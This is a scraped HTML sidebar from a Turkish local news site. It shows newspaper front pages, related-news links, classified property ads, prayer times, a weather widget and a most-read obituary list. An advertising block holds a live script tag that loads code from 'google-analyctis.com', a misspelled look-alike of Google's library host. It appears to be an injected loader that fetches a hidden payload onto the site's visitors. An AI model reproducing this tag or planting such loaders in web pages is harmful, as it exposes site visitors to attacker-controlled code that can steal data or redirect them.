title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/da%C4%9Fl%C4%B1k+alanda+%C3%B6l%C3%BC+bulundu" title="Dağlık Alanda ölü Bulundu haberleri">Dağlık Alanda ölü Bulundu</a><a href="http://www.elbistaninsesi.com/haberleri/Elbistanl%C4%B1+%C3%A7ocuk" title="Elbistanlı çocuk haberleri">Elbistanlı çocuk</a></div> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye-gazetesi" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/turkiye-gazetesi.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/aydinlik-gazetesi" title="Aydınlık" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-02-11//thumbs-150/aydinlik-gazetesi.jpg" alt="Aydınlık"/></div> <p>Aydınlık</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-asi-programi-ve-vaka-sayilarini-degerlendirdi-h69221.html" title="Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/kaymakam_demir_asi_programi_ve_vaka_sayilarini_degerlendirdi_h69221_c9348.jpg" alt="Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi" /> <span>Kaymakam Demir, aşı programı ve vaka sayılarını...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/saadet-partisi-nden-bir-damla-tasarruf-cagrisi-h69220.html" title="Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/saadet_partisi_nden_bir_damla_tasarruf_cagrisi_h69220_0dc55.jpg" alt="Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı" /> <span>Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039;...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/isgale-karsi-elbistanlilarin-mukarrerati-102-yil-sonra-yeniden-okundu-h69218.html" title="İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/isgale_karsi_elbistanlilarin_mukarrerati_102_yil_sonra_yeniden_okundu_h69218_74da3.jpg" alt="İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu" /> <span>İşgale karşı ‘Elbistanlıların Mukarreratı’...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/yarali-sahine-jandarma-sefkati-h69215.html" title="Yaralı şahine jandarma şefkati"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/yarali_sahine_jandarma_sefkati_h69215_7e775.jpg" alt="Yaralı şahine jandarma şefkati" /> <span>Yaralı şahine jandarma şefkati</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/unal-istiklal-ilham-verir-h69214.html" title="Ünal: “İstiklal ilham verir”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/unal_istiklal_ilham_verir_h69214_5a3fe.jpg" alt="Ünal: “İstiklal ilham verir”" /> <span>Ünal: “İstiklal ilham verir”</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kahramanmaras-milletvekillerinden-kurtulus-coskusu-aciklamasi-h69210.html" title="Kahramanmaraş milletvekillerinden kurtuluş coşkusu açıklaması"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/kahramanmaras_milletvekillerinden_kurtulus_coskusu_aciklamasi_h69210_a4e3a.jpg" alt="Kahramanmaraş milletvekillerinden kurtuluş coşkusu açıklaması" /> <span>Kahramanmaraş milletvekillerinden kurtuluş coşkusu...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-kademeli-yuz-yuze-egitime-gececek-okul-sayisi-belli-oldu-h69209.html" title="Elbistan’da kademeli yüz yüze eğitime geçecek okul sayısı belli oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/elbistanda_kademeli_yuz_yuze_egitime_gececek_okul_sayisi_belli_oldu_h69209_dae6c.jpg" alt="Elbistan’da kademeli yüz yüze eğitime geçecek okul sayısı belli oldu" /> <span>Elbistan’da kademeli yüz yüze eğitime geçecek...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/komsu-ilcede-sicaklik-rekoru-kirildi-h69208.html" title="Komşu ilçede sıcaklık rekoru kırıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/komsu_ilcede_sicaklik_rekoru_kirildi_h69208_8d74f.jpg" alt="Komşu ilçede sıcaklık rekoru kırıldı" /> <span>Komşu ilçede sıcaklık rekoru kırıldı</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sabah-8-aksam-8-evde-calisacak-bayan-araniyor-13529.html" title="SABAH 8-AKŞAM 8 EVDE ÇALIŞACAK BAYAN ARANIYOR" >SABAH 8-AKŞAM 8 EVDE ÇALIŞACAK BAYAN ARANIYOR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sabah-8-aksam-8-evde-calisacak-bayan-araniyor-13529.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SABAH 8-AKŞAM 8 EVDE ÇALIŞACAK BAYAN ARANIYOR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13528.html" title="Satılık arsa" >Satılık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13528.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/a61db92f8dc7623758199b01fa7fbdb1efa4e942.jpg" alt="Satılık arsa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13527.html" title="Satılık arsa" >Satılık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13527.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/54cc90bcb2ba48d753f30857a3d76bdfbcff4292.jpg" alt="Satılık arsa" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-1125m2-arsa-13526.html" title="Satılık 1.125m2 arsa" >Satılık 1.125m2 arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-1125m2-arsa-13526.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/156d9a61de21afbf1ad4c5aeb086855c36b73fce.jpg" alt="Satılık 1.125m2 arsa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13525.html" title="Satılık daire" >Satılık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13525.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/093632de8bd0585bfdff5e571fdc477e06f50687.jpg" alt="Satılık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13524.html" title="Satılık daire" >Satılık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13524.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/ba1ef829aabbaba03fd5ec776f46dfe1bf8c981a.jpg" alt="Satılık daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-mustakil-iki-katli-ev-13523.html" title="Satılık müstakil iki katlı ev" >Satılık müstakil iki katlı ev</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-mustakil-iki-katli-ev-13523.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/34be6a36b25142d3c6a39fec966f954f3159fc25.jpg" alt="Satılık müstakil iki katlı ev" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-mustakil-iki-katli-ev-13521.html" title="Satılık müstakil iki katlı ev" >Satılık müstakil iki katlı ev</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-mustakil-iki-katli-ev-13521.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/c05be81be1133e1399ca47f4f1af0ca762aaacb2.jpg" alt="Satılık müstakil iki katlı ev" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-13517.html" title="Satılık tarla" >Satılık tarla</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-13517.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık tarla" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-21-13511.html" title="Satılık daire 2+1" >Satılık daire 2+1</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-21-13511.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık daire 2+1" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kral-petrol-ofisi-13510.html" title="KRAL PETROL OFİSİ" >KRAL PETROL OFİSİ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kral-petrol-ofisi-13510.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KRAL PETROL OFİSİ" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-840m2-arsa-13509.html" title="Satılık 840m2 arsa" >Satılık 840m2 arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-840m2-arsa-13509.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/832606f9d29e9f723974acd1d547eedb16a26146.jpg" alt="Satılık 840m2 arsa" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bakici-13508.html" title="Bakıcı" >Bakıcı</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bakici-13508.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Bakıcı" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13504.html" title="SATILIK ARSA" >SATILIK ARSA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13504.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK ARSA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-dogalgazli-daire-13503.html" title="Satılık dogalgazlı daire" >Satılık dogalgazlı daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-dogalgazli-daire-13503.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık dogalgazlı daire" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="https://facebook.com/elbistaninsesi" target="blank" id="likes">40.5B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="https://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="https://twitter.com/elbistaninsesi" target="blank" id="followers">96</a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="https://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>05:58</td> <td>07:19</td> <td>12:51</td> <td>15:47</td> <td>18:14</td> <td>19:30</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/whatsapp-vefat-hatti-h66390.html" title="WHATSAPP VEFAT HATTI" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/whatsapp_vefat_hatti_h66390_a8338.jpg" alt="WHATSAPP VEFAT HATTI" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/whatsapp-vefat-hatti-h66390.html" title="" ><span class="en-hit">1.</span> <strong>WHATSAPP VEFAT HATTI</strong> <span class="en-spot en-hidden">VEFAT BİLGİLERİNİZİ AŞAĞIDAKİ NUMARAYA İLETİNİZ. YAYINLIYALIM.</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/afsin-de-silahli-saldiri-2-kuzen-hayatini-kaybetti-h68950.html" title="Afşin#039;de silahlı saldırı:..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/afsin_de_silahli_saldiri_2_kuzen_hayatini_kaybetti_h68950_8d864.jpg" alt="Afşin#039;de silahlı saldırı:..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/afsin-de-silahli-saldiri-2-kuzen-hayatini-kaybetti-h68950.html" title="" ><span class="en-hit">2.</span> <strong>Afşin&#039;de silahlı saldırı:...</strong> <span class="en-spot en-hidden">Afşin ilçesinde tartıştıkları kişi tarafından silahla vurularak...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/gonul-turkmen-43-yasinda-h69110.html" title="Gönül Türkmen 43 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/gonul_turkmen_43_yasinda_h69110_c715d.jpg" alt="Gönül Türkmen 43 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/gonul-turkmen-43-yasinda-h69110.html" title="" ><span class="en-hit">3.</span> <strong>Gönül Türkmen 43 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/bicakli-kavga-1-olu-h69154.html" title="Bıçaklı kavga 1 ölü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/bicakli_kavga_1_olu_h69154_4049e.jpg" alt="Bıçaklı kavga 1 ölü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/bicakli-kavga-1-olu-h69154.html" title="" ><span class="en-hit">4.</span> <strong>Bıçaklı kavga 1 ölü</strong> <span class="en-spot en-hidden">Afşin ilçesine bağlı Emirli mahallesinde arkadaş oldukları belirtilen...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-ayda-gozukara-27-yasinda-h69179.html" title="Hatice Ayda Gözükara 27 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/hatice_ayda_gozukara_27_yasinda_h69179_9805e.jpg" alt="Hatice Ayda Gözükara 27 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-ayda-gozukara-27-yasinda-h69179.html" title="" ><span class="en-hit">5.</span> <strong>Hatice Ayda Gözükara 27 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-yuzbasi-berber-83-yasinda-h68936.html" title="İsmet Yüzbaşı(berber) 83 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/ismet_yuzbasi_berber_83_yasinda_h68936_bcd44.jpg" alt="İsmet Yüzbaşı(berber) 83 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-yuzbasi-berber-83-yasinda-h68936.html" title="" ><span class="en-hit">1.</span> <strong>İsmet Yüzbaşı(berber) 83 yaşında</strong> <span class="en-spot en-hidden">İsmet Yüzbaşı(berber) 83 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/yasar-corcu-70-yasinda-h68996.html" title="Yaşar Corcu 70 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/yasar_corcu_70_yasinda_h68996_1e5bb.jpg" alt="Yaşar Corcu 70 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/yasar-corcu-70-yasinda-h68996.html" title="" ><span class="en-hit">2.</span> <strong>Yaşar Corcu 70 yaşında</strong> <span class="en-spot en-hidden">Yaşar Corcu 70 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/gonul-turkmen-43-yasinda-h69110.html" title="Gönül Türkmen 43 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/gonul_turkmen_43_yasinda_h69110_c715d.jpg" alt="Gönül Türkmen 43 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/gonul-turkmen-43-yasinda-h69110.html" title="" ><span class="en-hit">3.</span> <strong>Gönül Türkmen 43 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hasim-tekdemir-h69041.html" title="Haşim Tekdemir" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/hasim_tekdemir_h69041_768cc.jpg" alt="Haşim Tekdemir"></a><div 